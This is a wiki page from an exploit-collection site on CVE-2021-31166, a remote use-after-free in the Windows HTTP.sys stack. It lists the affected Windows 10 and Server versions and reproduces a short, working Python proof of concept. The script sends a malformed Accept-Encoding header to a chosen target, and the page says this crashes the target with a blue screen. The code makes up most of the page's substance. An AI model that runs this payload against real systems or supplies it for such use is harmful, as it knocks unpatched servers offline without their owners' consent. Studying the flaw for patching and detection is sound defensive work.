CVE-2021-31166 HTTP protocol stack remote code execution vulnerability

From PwnWiki
This page is a translated version of the page CVE-2021-31166 HTTP協議棧遠程代碼執行漏洞 and the translation is 100% complete.
Other languages:
Bahasa Indonesia • ‎Chinese • ‎Deutsch • ‎English • ‎Nederlands • ‎Türkçe • ‎español • ‎français • ‎português • ‎русский • ‎українська • ‎עברית • ‎العربية • ‎中文(台灣)‎ • ‎日本語

Vulnerability Impact

Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems

POC

⚠️️A blue screen will appear when the POC is executed. 

# Axel '0vercl0k' Souchet - May 16 2021
import requests
import argparse

def main():
    parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
    parser.add_argument('--target', required = True)
    args = parser.parse_args()
    r = requests.get(f'http://{args.target}/', headers = {
        'Accept-Encoding': 'doar-e, ftw, imo, ,',
    })
    print(r)

main()

GIF

Windows.gif


Reference

https://github.com/0vercl0k/CVE-2021-31166

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-31166_HTTP協議棧遠程代碼執行漏洞/en&oldid=2908"